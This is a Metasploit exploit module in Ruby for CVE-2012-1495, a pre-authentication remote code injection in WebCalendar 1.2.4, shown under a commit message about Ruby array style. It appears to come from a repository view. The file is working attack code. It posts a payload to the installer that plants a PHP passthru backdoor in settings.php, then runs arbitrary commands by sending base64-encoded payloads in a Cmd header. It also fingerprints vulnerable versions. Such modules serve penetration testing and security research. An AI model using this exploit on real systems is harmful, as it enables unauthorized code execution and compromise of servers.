Tod Beardsley
c547e84fa7
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
106 lines
2.9 KiB
Ruby
106 lines
2.9 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "WebCalendar 1.2.4 Pre-Auth Remote Code Injection",
|
|
'Description' => %q{
|
|
This modules exploits a vulnerability found in k5n.us WebCalendar, version 1.2.4 or
|
|
less. If not removed, the settings.php script meant for installation can be
|
|
update by an attacker, and then inject code in it. This allows arbitrary code
|
|
execution as www-data.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'EgiX', #Initial discovery & PoC
|
|
'sinn3r' #Metasploit
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2012-1495'],
|
|
['OSVDB', '81329'],
|
|
['EDB', '18775']
|
|
],
|
|
'Arch' => ARCH_CMD,
|
|
'Platform' => %w{ linux unix },
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd'
|
|
},
|
|
'Targets' =>
|
|
[
|
|
['WebCalendar 1.2.4 on Linux', {}],
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => "Apr 23 2012",
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, 'The URI path to webcalendar', '/WebCalendar-1.2.4/'])
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
uri = normalize_uri(target_uri.path)
|
|
uri << '/' if uri[-1, 1] != '/'
|
|
|
|
res = send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => "#{uri}/login.php"
|
|
})
|
|
|
|
if res and res.body =~ /WebCalendar v1.2.\d/
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
end
|
|
|
|
|
|
def exploit
|
|
peer = "#{rhost}:#{rport}"
|
|
|
|
uri = target_uri.path
|
|
|
|
print_status("#{peer} - Housing php payload...")
|
|
|
|
# Allow commands to be passed as a header.
|
|
# We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff.
|
|
post_data = "app_settings=1"
|
|
post_data << "&form_user_inc=user.php"
|
|
post_data << "&form_single_user_login=*/print(____);passthru(base64_decode($_SERVER[HTTP_CMD]));die;"
|
|
post_data << "\n"*2
|
|
send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(uri, 'install/index.php'),
|
|
'data' => post_data
|
|
})
|
|
|
|
print_status("#{peer} - Loading our payload...")
|
|
|
|
# Execute our payload
|
|
send_request_raw({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(uri, 'includes/settings.php'),
|
|
'headers' => {
|
|
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
|
}
|
|
})
|
|
|
|
handler
|
|
end
|
|
end
|